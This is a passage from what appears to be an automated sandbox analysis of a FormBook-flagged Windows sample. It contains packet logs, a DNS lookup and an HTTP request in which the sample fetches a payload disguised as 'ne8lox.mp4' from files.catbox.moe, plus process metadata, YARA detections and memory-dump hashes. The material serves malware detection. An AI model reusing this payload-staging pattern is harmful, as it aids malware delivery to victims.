                                        Nov 26, 2024 00:19:51.358421087 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.358437061 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.358501911 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.358510971 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.358553886 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.365395069 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.365422010 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.365463972 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.365472078 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.365513086 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.394553900 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.394582987 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.394670010 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.394681931 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.394840002 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.526370049 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.526390076 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.526488066 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.526499987 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.526659966 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.533348083 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.533364058 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.533430099 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.533437967 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.533480883 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.539371014 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.539386988 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.539462090 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.539478064 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.539530993 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.546392918 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.546410084 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.546483040 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.546499014 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.546552896 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.552870989 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.552887917 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.552953959 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.552968979 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.553021908 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.559796095 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.559813023 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.559897900 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.559912920 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.559962988 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.566749096 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.566767931 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.566862106 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.566875935 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.566930056 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.596235991 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.596245050 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.596313953 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.596324921 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.596369028 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.728147984 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.728178978 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.728374004 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.728387117 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.728441954 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.734016895 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.734039068 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.734092951 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.734101057 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.734138012 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.734172106 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.740995884 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.741012096 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.741081953 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.741091013 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.741134882 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.747914076 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.747930050 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.747994900 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.748003960 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.748047113 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.754317045 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.754334927 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.754399061 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.754406929 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.754451036 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.761344910 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.761362076 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.761441946 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.761454105 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.761501074 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.767404079 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.767420053 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.767507076 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.767514944 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.767556906 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.797452927 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.797471046 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.797540903 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.797550917 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.797590971 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.929455042 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.929481030 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.929660082 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.929672003 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.929716110 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.936408997 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.936428070 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.936484098 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.936492920 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.936546087 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:19:51.943260908 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.943278074 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:19:51.943350077 CET49704443192.168.2.5108.181.20.35
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Nov 26, 2024 00:19:47.511893034 CET | 51500 | 53 | 192.168.2.5 | 1.1.1.1
                                        Nov 26, 2024 00:19:47.712332964 CET | 53 | 51500 | 1.1.1.1 | 192.168.2.5
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Nov 26, 2024 00:19:47.511893034 CET | 192.168.2.5 | 1.1.1.1 | 0xee14 | Standard query (0) | files.catbox.moe | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Nov 26, 2024 00:19:47.712332964 CET | 1.1.1.1 | 192.168.2.5 | 0xee14 | No error (0) | files.catbox.moe | | 108.181.20.35 | A (IP address) | IN (0x0001) | false
                                        • files.catbox.moe
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.5 | 49704 | 108.181.20.35 | 443 | 3148 | C:\Users\user\Desktop\file.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-11-25 23:19:49 UTC | 76 | OUT | GET /ne8lox.mp4 HTTP/1.1
                                        Host: files.catbox.moe
                                        Connection: Keep-Alive
                                        2024-11-25 23:19:50 UTC | 538 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Mon, 25 Nov 2024 23:19:49 GMT
                                        Content-Type: video/mp4
                                        Content-Length: 1192968
                                        Last-Modified: Mon, 25 Nov 2024 22:59:14 GMT
                                        Connection: close
                                        ETag: "67450142-123408"
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, HEAD
                                        Accept-Ranges: bytes


                                        Target ID:0
                                        Start time:18:19:46
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x3a0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:18:19:52
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x7d0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:11.4%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:2.9%
                                          Total number of Nodes:307
                                          Total number of Limit Nodes:8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                          • API String ID: 0-3443518476
                                          • Opcode ID: bbe4d424fc2c8fa7367a086b6b928f64258f5778f36e97f636e14289a26805ea
                                          • Instruction ID: 2e85aa1b27134813baa69361752f5bd9cc1f93c1161f2e9e3877736af7b00013
                                          • Opcode Fuzzy Hash: bbe4d424fc2c8fa7367a086b6b928f64258f5778f36e97f636e14289a26805ea
                                          • Instruction Fuzzy Hash: 63B22874A00218CFDB54DFA9C984BADB7B6BF88710F248499E506AB3A5DB70EC41CF51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                          • API String ID: 0-324474496
                                          • Opcode ID: 4b543630bbf60b77da0b1ea443a5c94d3a112dcc19cb78bbd7d135d2f54926ea
                                          • Instruction ID: bc056b3d62d89d9484ff112d2b531f24ad846b14fd31bc09dc78f1a47526b2af
                                          • Opcode Fuzzy Hash: 4b543630bbf60b77da0b1ea443a5c94d3a112dcc19cb78bbd7d135d2f54926ea
                                          • Instruction Fuzzy Hash: CE223B74A00618CFDB64DF68C984BADB7B6FF88314F1480A9E509AB7A5DB309D81CF51

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TJbq$Te]q$paq$xb`q
                                          • API String ID: 0-4160082283
                                          • Opcode ID: 6b3d8b07b45662857ad70f72bde528841a1ca4765dfd21bcb56bcf716d490248
                                          • Instruction ID: 4cd4b6aeb7e3de2eea851fd455dc7c0031887effd188d8003ebd37c1c59530b8
                                          • Opcode Fuzzy Hash: 6b3d8b07b45662857ad70f72bde528841a1ca4765dfd21bcb56bcf716d490248
                                          • Instruction Fuzzy Hash: 29A2A475E00228CFDB65DF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF40

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fbq$8$I?~n
                                          • API String ID: 0-378195606
                                          • Opcode ID: d3297f4e44e4c372f10beabbab25dcf29228f1ef273fff4db60504be288ed991
                                          • Instruction ID: dd4569a2f299068a82d8d13095c4ea1b13ce6b075cf5a3cfd02446b29450d24a
                                          • Opcode Fuzzy Hash: d3297f4e44e4c372f10beabbab25dcf29228f1ef273fff4db60504be288ed991
                                          • Instruction Fuzzy Hash: B852E675E002298FDBA4DF69C850BD9B7B1FF89300F5086AAD909A7355DB30AE85CF50

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$$]q
                                          • API String ID: 0-351713980
                                          • Opcode ID: c27e295c22735f5815c4006a0aa970716a2e2b17d51ebfa0cf066fa4c88e40c6
                                          • Instruction ID: 0f62e34e71b050a29f449862e1e8540023ee20167bd5773dd51fc778198fef83
                                          • Opcode Fuzzy Hash: c27e295c22735f5815c4006a0aa970716a2e2b17d51ebfa0cf066fa4c88e40c6
                                          • Instruction Fuzzy Hash: 17E2E5B4E446288FCB64DF68D884B9ABBF2FB89301F1081E9D509A7355DB349E85CF50

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Pl]q$$]q
                                          • API String ID: 0-2369359564
                                          • Opcode ID: 4e90101c5e0d55661af8760d9aab71b4bde88055af9007d02b44b52a8d6530c2
                                          • Instruction ID: 43246282f39c5c867d2d6743a13e01299bdf10104c1de11df4c46e07d58c0531
                                          • Opcode Fuzzy Hash: 4e90101c5e0d55661af8760d9aab71b4bde88055af9007d02b44b52a8d6530c2
                                          • Instruction Fuzzy Hash: C1223674B012048FDB54DF28C994AAABBF2FF89710B1684A9E905CB375DB31ED42CB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fbq$h
                                          • API String ID: 0-3598783323
                                          • Opcode ID: 2d977fe7e17e5c9c4348c2fdf856b0f7b83f7f988b58863db24d947cf26857c2
                                          • Instruction ID: 7dafa60fb1a666db1d429fc3402d774d9a60cbced51a99eec423d7dcfd0c65e9
                                          • Opcode Fuzzy Hash: 2d977fe7e17e5c9c4348c2fdf856b0f7b83f7f988b58863db24d947cf26857c2
                                          • Instruction Fuzzy Hash: 4371F571E002299FDB64DF69D840BDAB7B2BF89300F50C2AAD509A7254DB306E85CF91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053923386.0000000006E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6e80000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Bv0s$T(u+
                                          • API String ID: 0-3775074207
                                          • Opcode ID: 8e94c4f38402a1bfff9171da0b39a7c7434601d452d09179bbc267ca5f5680f5
                                          • Instruction ID: 8008cf5eab7332520ee09ae2d6992febab7720007e0a5e4e06214058a026f42f
                                          • Opcode Fuzzy Hash: 8e94c4f38402a1bfff9171da0b39a7c7434601d452d09179bbc267ca5f5680f5
                                          • Instruction Fuzzy Hash: 42711974E40318DFDB94DF28D854BA9B7F2BF49300F5080A9E51AAB391DB359A85CF02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 2d633e31781677a3e1a80d49bc624bc7693b3d31042f7162860aafea26dd1c6c
                                          • Instruction ID: 60dcd68961f723a265b40b909c5c64eb38035986660bca1e8bbac35fd56438fe
                                          • Opcode Fuzzy Hash: 2d633e31781677a3e1a80d49bc624bc7693b3d31042f7162860aafea26dd1c6c
                                          • Instruction Fuzzy Hash: FF022570E45218CFDBA4DF68C884B9DB7F2FB49310F6084AAD409A7655CB349E85CF52
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CE77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: ca64a353f4fb905110a17b31a807ec79c720cdf2bc79e83811564166ab8a6342
                                          • Instruction ID: 8e0e01e473bbdd40c56c8e0c26ace3dcfcf16833c15d753a3620c0c8c0443856
                                          • Opcode Fuzzy Hash: ca64a353f4fb905110a17b31a807ec79c720cdf2bc79e83811564166ab8a6342
                                          • Instruction Fuzzy Hash: A021E7B5D013499FCB10DFAAD984AEEFBF5FF48310F20842AE919A7250C7759941CBA1
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06CE77B1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8b900cc0340daa535cc83eac881e3d67fc887a57c1a28959748b3bb8cd9dfef1
                                          • Instruction ID: b94e3c544f23d828dc1358841719f264edbc8f1c744a46236ac6a0e8c791724e
                                          • Opcode Fuzzy Hash: 8b900cc0340daa535cc83eac881e3d67fc887a57c1a28959748b3bb8cd9dfef1
                                          • Instruction Fuzzy Hash: 9321E6B5D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A940CBA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06CE9CFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 72cae17044dcf9c768715e2a11a3224e4b4ca374674fdcb80fae75756ae4ba2d
                                          • Instruction ID: 126066027ee44072276099ebdecd02f041d9d7e816d56bb09c3470d752d1a1d7
                                          • Opcode Fuzzy Hash: 72cae17044dcf9c768715e2a11a3224e4b4ca374674fdcb80fae75756ae4ba2d
                                          • Instruction Fuzzy Hash: 2D1117B5D002098FCB20DFAAC4456EEFBF5FF48310F10842AD459A7240CB79A945CFA1
                                          APIs
                                          • NtResumeThread.NTDLL(?,?), ref: 06CE9CFE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 1a43fc1b776e8a6184da3083fe81e40ae849785dacb8ca9b5bcc7c5fda806573
                                          • Instruction ID: 0ecb188e005a0cd9e73fe481918716f6a881683d28268d11b5d337d369da8677
                                          • Opcode Fuzzy Hash: 1a43fc1b776e8a6184da3083fe81e40ae849785dacb8ca9b5bcc7c5fda806573
                                          • Instruction Fuzzy Hash: 7B11F6B5D002098FDB10DFAAC884AEEFBF5FF48314F10842AD419A7240CB78A945CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH]q
                                          • API String ID: 0-3168235125
                                          • Opcode ID: 999f22ab7841e976cf048e5e14c7e9efe04160f30392bd566ff87cf273782fcb
                                          • Instruction ID: 31b1e9ec96dd8fd0179ddaef2bb6bc3d48ed1981130dd38c49e070658fddb527
                                          • Opcode Fuzzy Hash: 999f22ab7841e976cf048e5e14c7e9efe04160f30392bd566ff87cf273782fcb
                                          • Instruction Fuzzy Hash: E8C11870E44258CFEBA4DF99C884B9DBBF2FB49304F2080A9D609A7655D7749D84CF42
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: 3cc07c2e58b202461a5d068b0888c94bd5f4d585d1f51884492abb047886d2a4
                                          • Instruction ID: 521eb19354967967c5b62f489078bf72964c5ec230fa19aef815c75b19b2bf5c
                                          • Opcode Fuzzy Hash: 3cc07c2e58b202461a5d068b0888c94bd5f4d585d1f51884492abb047886d2a4
                                          • Instruction Fuzzy Hash: 4DB12674E45208CFEBA4CFA9C984B9DBBF2BF48310F2080A9D519AB655DB345E85CF41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052621808.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te]q
                                          • API String ID: 0-52440209
                                          • Opcode ID: c83267608f55c0459baed9f25a2af33b6c8bca5d7f13fb6ad7e7e8bae20203be
                                          • Instruction ID: 1ce4752ff8351d5ca524cf4f0bad465cbaa6eac7e31ebf9e11d83df7bbe2a800
                                          • Opcode Fuzzy Hash: c83267608f55c0459baed9f25a2af33b6c8bca5d7f13fb6ad7e7e8bae20203be
                                          • Instruction Fuzzy Hash: 91B13774E44208CFEBA4CFA9C984B9DBBF6BF49310F2080A9D419A7655D7345E85CF42
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c47430f5411d30aa3bdd2894110aa424a30f15089d5069551e05a2808869322c
                                          • Instruction ID: ad9dce3e0ed79c6bb6aad403de868944fbdcf24887b35c1e47fecd3d01b08b6c
                                          • Opcode Fuzzy Hash: c47430f5411d30aa3bdd2894110aa424a30f15089d5069551e05a2808869322c
                                          • Instruction Fuzzy Hash: 5B52C3B4A042298FCB64DF28D984B9ABBF6FB48301F1091D9D90DA7355DB30AE85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c2600d5f85b8cc08b4dcf65f0583855665e06fff4cedcd344159192a4fd1036
                                          • Instruction ID: 05596d5cc8d6de8d9165a0ea94e05d706ac6ffc2ec10fad31feed951f4682c4e
                                          • Opcode Fuzzy Hash: 8c2600d5f85b8cc08b4dcf65f0583855665e06fff4cedcd344159192a4fd1036
                                          • Instruction Fuzzy Hash: F2A14770E45208CFDBA4DF69D844BEEBBF2BB49300F50906AD518A7354DB349985CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 90f93de85914ed921af0584740e3495cf940453b08d28ceb26033d6c96fbc513
                                          • Instruction ID: f05b953581fe0481f4dc84a90f96ff8d888b420c74dedbb1c7ab7b664d95a202
                                          • Opcode Fuzzy Hash: 90f93de85914ed921af0584740e3495cf940453b08d28ceb26033d6c96fbc513
                                          • Instruction Fuzzy Hash: C2811B74E01209DFDB44DF99D580AAEBBF6FF88300F10842AE419AB355DB34A945CF51
                                          Memory Dump Source
